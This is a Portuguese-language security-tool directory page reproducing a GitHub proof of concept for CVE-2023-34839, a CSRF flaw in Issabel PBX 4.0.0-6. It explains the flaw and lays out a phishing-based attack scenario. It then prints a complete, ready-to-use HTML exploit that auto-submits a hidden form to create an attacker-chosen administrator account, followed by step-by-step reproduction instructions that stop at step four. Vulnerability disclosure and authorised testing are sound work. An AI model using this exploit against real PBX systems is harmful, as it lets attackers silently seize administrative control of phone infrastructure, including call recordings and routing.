Skip to content
KitploitKITPLOIT
FerramentasExploitsBlog
Log in
Enviar
FerramentasExploitsBlog
Enviar

Ferramentas de Hacking, PenTest e Cibersegurança para o seu Arsenal de Segurança!

Kitploit é um diretório de ferramentas de hacking, cibersegurança e pentesting. Descubra as últimas atualizações de projetos para encontrar vulnerabilidades, analisar sistemas, automatizar testes e fortalecer sua segurança.

··Feeds·Contato·Privacidade·© 2026 Kitploit

Diretório de Ferramentas

Categorias

Ver todas as categorias
Loading categories
CVE-2023-34839 — CVE-2023-34839 é uma vulnerabilidade de Cross-Site Request Forgery (CSRF) descoberta no Issabel PBX versão 4.0.0-6, uma plataforma de comunicações unificadas de código aberto amplamente utilizada. | Kitploit
Ferramentas/GitHubGitHub/sahiloj/cve-2023-34839
Análise de VulnerabilidadesExploraçãoExploração de Aplicações WebTestes de PenetraçãoPapers e PesquisaAprendizado e Educação
GitHubsahiloj/cve-2023-34839

CVE-2023-34839

CVE-2023-34839 é uma vulnerabilidade de Cross-Site Request Forgery (CSRF) descoberta no Issabel PBX versão 4.0.0-6, uma plataforma de comunicações unificadas de código aberto amplamente utilizada.

Ver Repositório
5310há 7 mesesAinda não revisado

Mais Populares

Ver todos →

Descubra as ferramentas mais usadas pela nossa comunidade.

Explore todas as ferramentas

Navegue pela nossa coleção de ferramentas

Ver todas as ferramentas →
Compartilhar

CVE-2023-34839 — Issabel PBX 4.0.0-6: CSRF para Escalação de Privilégios

CVE Severity CVSS Affected Version


Índice

  • Visão Geral
  • Detalhes da Vulnerabilidade
  • Software Afetado
  • Pontuação CVSS
  • Cenário de Ataque
  • Prova de Conceito (PoC)
  • Passos para Reproduzir
  • Impacto
  • Remediação
  • Referências
  • Aviso Legal

Visão Geral

CVE-2023-34839 é uma vulnerabilidade de Cross-Site Request Forgery (CSRF) descoberta no Issabel PBX versão 4.0.0-6, uma plataforma de comunicações unificadas open-source amplamente utilizada. A vulnerabilidade reside no endpoint de gerenciamento de usuários e permite que um atacante remoto não autenticado crie silenciosamente uma nova conta de administrador, enganando um administrador atualmente autenticado para que visite uma página web especialmente criada.

CampoValor
ID do CVECVE-2023-34839
Data23 de junho de 2023
PesquisadorSahil Ojha
FornecedorIssabel
ProdutoIssabel PBX
Versão4.0.0-6
Testado EmWindows

Detalhes da Vulnerabilidade

O Issabel PBX 4.0.0-6 não implementa proteções contra CSRF (por exemplo, tokens sincronizadores, atributos de cookie SameSite ou validação dos cabeçalhos Origin / Referer) no endpoint de criação de usuário:

POST /index.php?menu=userlist&action=new

Como a aplicação depende exclusivamente de cookies de sessão para autenticação e não realiza validação de requisições que alteram estado, uma requisição POST forjada enviada de qualquer origem será aceita e processada com todos os privilégios da sessão do administrador conectado.

Causa raiz: Ausência de validação de token anti-CSRF em endpoints administrativos que alteram estado.

Classe de vulnerabilidade: CWE-352 — Cross-Site Request Forgery (CSRF)


Software Afetado

SoftwareVersãoStatus
Issabel PBX4.0.0-6Vulnerável ✔
  • Página do Fornecedor: https://www.issabel.org/
  • Código-fonte: https://github.com/IssabelFoundation/issabelPBX

Pontuação CVSS

MétricaValor
Vetor CVSS v3.1AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H
Pontuação Base8.8 (Alta)
Vetor de AtaqueRede
Complexidade de AtaqueBaixa
Privilégios NecessáriosNenhum
Interação do UsuárioNecessária (visita do administrador)
EscopoInalterado
ConfidencialidadeAlta
IntegridadeAlta
DisponibilidadeAlta

Cenário de Ataque

Um atacante pode explorar esta vulnerabilidade seguindo estes passos de alto nível:

  1. Criar uma página HTML maliciosa que contenha um formulário oculto direcionado ao endpoint de criação de usuário do Issabel PBX, com valores controlados pelo atacante (nome de usuário, senha, grupo = administrador).
  2. Hospedar a página maliciosa em um servidor ou enviá-la ao administrador alvo por e-mail de phishing, mensagem de chat ou qualquer vetor de engenharia social.
  3. Aguardar o administrador abrir o link enquanto possui uma sessão ativa e autenticada com a aplicação Issabel PBX.
  4. O navegador envia o formulário automaticamente usando o cookie de sessão existente da vítima, fazendo com que a aplicação crie silenciosamente uma nova conta de administrador.
  5. O atacante faz login com as credenciais recém-criadas e obtém acesso total de administrador ao sistema PBX, incluindo roteamento de chamadas, gravações, configuração de troncos SIP e todas as configurações do sistema.

Nenhuma interação além de uma única visita à página é necessária por parte da vítima.


Prova de Conceito (PoC)

⚠️ Apenas para fins educacionais e de testes autorizados.
Substitua localhost pelo nome de host ou endereço IP da instância Issabel PBX alvo.
Se estiver testando contra um endpoint https:// com certificado autoassinado, você deve primeiro visitar a URL alvo no mesmo navegador e aceitar o aviso de certificado; caso contrário, o navegador bloqueará o envio do formulário cross-origin.

<html>
  <!-- CSRF Exploit — CVE-2023-34839 -->
  <body>
    <form action="https://localhost/index.php?menu=userlist&action=new" method="POST">
      <input type="hidden" name="save"             value="Save" />
      <input type="hidden" name="name"             value="CSRF" />
      <input type="hidden" name="description"      value="CSRF Test Account" />
      <input type="hidden" name="password1"        value="Test@123" />
      <input type="hidden" name="password2"        value="Test@123" />
      <input type="hidden" name="group"            value="1" />   <!-- 1 = Administrator -->
      <input type="hidden" name="extension"        value="" />
      <input type="hidden" name="webmailuser"      value="" />
      <input type="hidden" name="webmaildomain"    value="" />
      <input type="hidden" name="webmailpassword1" value="" />
      <input type="hidden" name="id_user"          value="" />
      <input type="submit" value="Submit request" />
    </form>
    <script>
      history.pushState('', '', '/');
      document.forms[0].submit();
    </script>
  </body>
</html>

O arquivo de exploit também está disponível neste repositório: CSRF Exploit.html


Passos para Reproduzir

Pré-requisitos

  • Uma instância do Issabel PBX 4.0.0-6 em execução.
  • Uma conta de administrador com uma sessão de navegador ativa.
  • Um navegador na mesma máquina da sessão do administrador.

Passo 1 — Faça login no Issabel PBX como Administrador

Acesse a interface web do Issabel PBX e faça login com as credenciais de administrador.

Login do Issabel PBX


Passo 2 — Prepare o Exploit de CSRF

Copie o código HTML do PoC acima e salve-o como um arquivo .html, substituindo localhost pelo nome de host ou endereço IP real da instância Issabel alvo.

O exploit usa campos de formulário ocultos para enviar silenciosamente uma requisição POST de criação de novo usuário para a aplicação. Quando a página carrega, o JavaScript embutido envia o formulário imediatamente, sem nenhuma ação visível do usuário.

HTML do Exploit de CSRF


Passo 3 — Abra o Exploit no Mesmo Navegador

Abra o arquivo HTML salvo no mesmo navegador (em uma nova aba) enquanto a sessão do administrador ainda estiver ativa. O formulário será enviado automaticamente imediatamente após o carregamento da página.


Passo 4 — Verifique se a Nova Conta de Administrador Foi Criada

Baixar ferramenta